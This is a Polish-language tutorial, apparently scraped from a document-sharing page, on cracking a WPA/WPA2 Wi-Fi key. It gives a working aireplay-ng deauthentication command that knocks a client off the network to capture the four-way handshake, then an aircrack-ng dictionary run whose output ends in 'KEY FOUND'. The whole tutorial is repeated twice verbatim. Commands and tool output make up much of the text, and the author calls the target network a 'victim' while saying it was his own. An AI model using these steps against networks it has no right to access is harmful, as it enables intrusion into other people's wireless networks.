łamanie wpa wpa 2, WEP WPA

[ Pobierz całość w formacie PDF ]

Atak na sieć zabezpieczoną WPA lub WPA2

Atak na sieć zabezpieczoną WPA lub WPA2



WPA, czyli Wi-Fi Protected Access to schemat szyfrowania zaprojektowany przez Wi-Fi Alliance w celu zastąpienia WEP i wszystkich związanych z nim niebezpieczeństw. Główną różnicą między WEP a WPA jest to, że przy WPA celem ataku nie są wszystkie dane przesyłane z i do AP (ponieważ klucz, jakimi są szyfrowane, jest dynamicznie zmieniany), a tylko bardzo specyficzny ich typ - tzw. four-way handshake, następujący wtedy, gdy klient dołącza się do sieci i następuje wymiana hasła dostępowego między AP i klientem. Niestety, hasło to jest też zaszyfrowane. Jedyną metodą ataku na sieć zabezpieczoną WPA jest atak słownikowy lub bruteforce. Obydwa mają - w porównaniu do metod łamania WEP - bardzo małą efektywność.

Jednak zacznijmy. Naszą ofiarą jest :

CH 11 ][ Elapsed: 1 min ][ 2008-08-16 23:41                               

                                                                                                                 

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                              

                                                                                                                 

00:C7:D2:17:64:A7  212 100      606      151    2  11  54 . WPA  TKIP   PSK  LouderThanBombs                    

                                                                                                                 

BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                         

                                                                                                                 

00:C7:D2:17:64:A7  00:13:E8:BA:B5:59  212  54-54      1      115  LouderThanBombs

Jak widzimy, do sieci jest podłączony jeden klient i wymienia dane. Jednak jest to dla nas całkowicie bezużyteczne. Musimy sobie pomóc aireplay'em. Użyjemy ataku numer zero, czyli deauth. Wysyła on do klienta pakiet mówiący, że nie jest on już połączony z AP, przez co - miejmy nadzieję - połączy się on jeszcze raz, dzięki czemu my uzyskamy nasz four-way handshake. Aireplay wywołujemy następującym poleceniem :

sudo aireplay-ng -0 1 -c 00:13:E8:BA:B5:59 -a 00:C7:D2:17:64:A7 mon0

Spowoduje to uruchomienie aireplay w trybie ataku deauth, który nie będzie ponawiany (-0 1). Celem tego ataku będzie klient o adresie 00:13:E8:BA:B5:59 podłączony do AP o BSSID 00:C7:D2:17:64:A7. Injekcja odbędzie się na interfejsie mon0. Program zwraca :

23:45:51  Waiting for beacon frame (BSSID: 00:C7:D2:17:64:A7) on channel 11

23:45:52  Sending 64 directed DeAuth. STMAC: [00:13:E8:BA:B5:59] [333|318 ACKs]

A w tym czasie - miejmy nadzieję - w oknie cały czas otwartego airodump'a pojawi się informacja (obok daty i godziny) WPA handshake: 00:C7:D2:17:64:A7. Oznacza to, że udało się nam przechwycić four-way handshake i możemy przystąpić do łamania hasła do sieci.

Aircrack'a uruchamiamy następującym poleceniem :

aircrack-ng -w passwords louder-01.cap

Spowoduje to sprawdzenie, czy hasło do handshake'u znajdującego się w louder-01.cap znajduje się w liście passwords. Jeśli aircrack'a uruchomimy bez opcji -w, a wykryje on, że w pliku jemu podawanym znajduje się tylko sieć WPA, zakończy działanie. Jeśli wszystko pójdzie elegancko, zobaczymy następującą treść :

daniel@Sara:~$ aircrack-ng -w passwords louder2-01.cap

Opening louder2-01.cap

Read 2550 packets.

 

   #  BSSID              ESSID                     Encryption

 

   1  00:C7:D2:17:64:A7  LouderThanBombs           WPA (1 handshake)

 

Choosing first network as target.

 

Opening louder2-01.cap

Reading packets, please wait...

 

                                 Aircrack-ng 1.0 rc1 r1147

 

 

                   [00:00:00] 2 keys tested (59.71 k/s)

 

 

                         KEY FOUND! [ RubberRing ]

 

 

      Master Key     : D1 F7 CC 95 E3 CF 3F 37 EB 46 71 11 3A 9C CA 31

                       56 02 98 5C 28 49 63 7A 66 AB CE C7 8D 48 0E D7

 

      Transcient Key : 94 9B A8 0B 0D 34 A0 E6 11 D2 F1 15 B5 3C 68 A9

                       E7 A4 4C 16 01 B4 F8 2C C4 97 B4 69 BE 33 18 CC

                       CF 34 50 9C C8 03 B0 CE 7B D3 3F C1 37 D3 7D 12

                       D1 23 47 79 79 DB A7 15 5A A1 5D 5F 91 0F A3 44

 

      EAPOL HMAC     : 40 60 09 CB 69 93 9B CF AE 17 DF F3 6B A9 8B AA

I tak wygląda łamanie WPA. W moim przypadku poszło bez problemu, bo wiedziałem, jaki jest klucz do mojej własnej sieci, i wpisałem go do listy haseł przeznaczonych do sprawdzenia. Jeśli jednak ofiara zna się mniej więcej na zabezpieczeniach i klucz do jej sieci ma ponad 20 znaków, mogę Ci tylko życzyć powodzenia i długiego (bardzo długiego) czekania. Łamanie WPA2 niczym się nie różni, dlatego nie widziałem sensu w tworzeniu osobnego rozdziału.


WPA, czyli Wi-Fi Protected Access to schemat szyfrowania zaprojektowany przez Wi-Fi Alliance w celu zastąpienia WEP i wszystkich związanych z nim niebezpieczeństw. Główną różnicą między WEP a WPA jest to, że przy WPA celem ataku nie są wszystkie dane przesyłane z i do AP (ponieważ klucz, jakimi są szyfrowane, jest dynamicznie zmieniany), a tylko bardzo specyficzny ich typ - tzw. four-way handshake, następujący wtedy, gdy klient dołącza się do sieci i następuje wymiana hasła dostępowego między AP i klientem. Niestety, hasło to jest też zaszyfrowane. Jedyną metodą ataku na sieć zabezpieczoną WPA jest atak słownikowy lub bruteforce. Obydwa mają - w porównaniu do metod łamania WEP - bardzo małą efektywność.

Jednak zacznijmy. Naszą ofiarą jest :

CH 11 ][ Elapsed: 1 min ][ 2008-08-16 23:41                               

                                                                                                                 

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                              

                                                                                                                 

00:C7:D2:17:64:A7  212 100      606      151    2  11  54 . WPA  TKIP   PSK  LouderThanBombs                    

                                                                                                                 

BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                         

                                                                                                                 

00:C7:D2:17:64:A7  00:13:E8:BA:B5:59  212  54-54      1      115  LouderThanBombs

Jak widzimy, do sieci jest podłączony jeden klient i wymienia dane. Jednak jest to dla nas całkowicie bezużyteczne. Musimy sobie pomóc aireplay'em. Użyjemy ataku numer zero, czyli deauth. Wysyła on do klienta pakiet mówiący, że nie jest on już połączony z AP, przez co - miejmy nadzieję - połączy się on jeszcze raz, dzięki czemu my uzyskamy nasz four-way handshake. Aireplay wywołujemy następującym poleceniem :

sudo aireplay-ng -0 1 -c 00:13:E8:BA:B5:59 -a 00:C7:D2:17:64:A7 mon0

Spowoduje to uruchomienie aireplay w trybie ataku deauth, który nie będzie ponawiany (-0 1). Celem tego ataku będzie klient o adresie 00:13:E8:BA:B5:59 podłączony do AP o BSSID 00:C7:D2:17:64:A7. Injekcja odbędzie się na interfejsie mon0. Program zwraca :

23:45:51  Waiting for beacon frame (BSSID: 00:C7:D2:17:64:A7) on channel 11

23:45:52  Sending 64 directed DeAuth. STMAC: [00:13:E8:BA:B5:59] [333|318 ACKs]

A w tym czasie - miejmy nadzieję - w oknie cały czas otwartego airodump'a pojawi się informacja (obok daty i godziny) WPA handshake: 00:C7:D2:17:64:A7. Oznacza to, że udało się nam przechwycić four-way handshake i możemy przystąpić do łamania hasła do sieci.

Aircrack'a uruchamiamy następującym poleceniem :

aircrack-ng -w passwords louder-01.cap

Spowoduje to sprawdzenie, czy hasło do handshake'u znajdującego się w louder-01.cap znajduje się w liście passwords. Jeśli aircrack'a uruchomimy bez opcji -w, a wykryje on, że w pliku jemu podawanym znajduje się tylko sieć WPA, zakończy działanie. Jeśli wszystko pójdzie elegancko, zobaczymy następującą treść :

daniel@Sara:~$ aircrack-ng -w passwords louder2-01.cap

Opening louder2-01.cap

Read 2550 packets.

 

   #  BSSID              ESSID                     Encryption

 

   1  00:C7:D2:17:64:A7  LouderThanBombs           WPA (1 handshake)

 

Choosing first network as target.

 

Opening louder2-01.cap

Reading packets, please wait...

 

                                 Aircrack-ng 1.0 rc1 r1147

 

 

                   [00:00:00] 2 keys tested (59.71 k/s)

 

 

                         KEY FOUND! [ RubberRing ]

 

 

      Master Key     : D1 F7 CC 95 E3 CF 3F 37 EB 46 71 11 3A 9C CA 31

                       56 02 98 5C 28 49 63 7A 66 AB CE C7 8D 48 0E D7

 

      Transcient Key : 94 9B A8 0B 0D 34 A0 E6 11 D2 F1 15 B5 3C 68 A9

                       E7 A4 4C 16 01 B4 F8 2C C4 97 B4 69 BE 33 18 CC

                       CF 34 50 9C C8 03 B0 CE 7B D3 3F C1 37 D3 7D 12

                       D1 23 47 79 79 DB A7 15 5A A1 5D 5F 91 0F A3 44

 

      EAPOL HMAC     : 40 60 09 CB 69 93 9B CF AE 17 DF F3 6B A9 8B AA

I tak wygląda łamanie WPA. W moim przypadku poszło bez problemu, bo wiedziałem, jaki jest klucz do mojej własnej sieci, i wpisałem go do listy haseł przeznaczonych do sprawdzenia. Jeśli jednak ofiara zna się mniej więcej na zabezpieczeniach i klucz do jej sieci ma ponad 20 znaków, mogę Ci tylko życzyć powodzenia i długiego (bardzo długiego) czekania. Łamanie WPA2 niczym się nie różni, dlatego nie widziałem sensu w tworzeniu osobnego rozdziału.
 

[ Pobierz całość w formacie PDF ]
  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • katek.htw.pl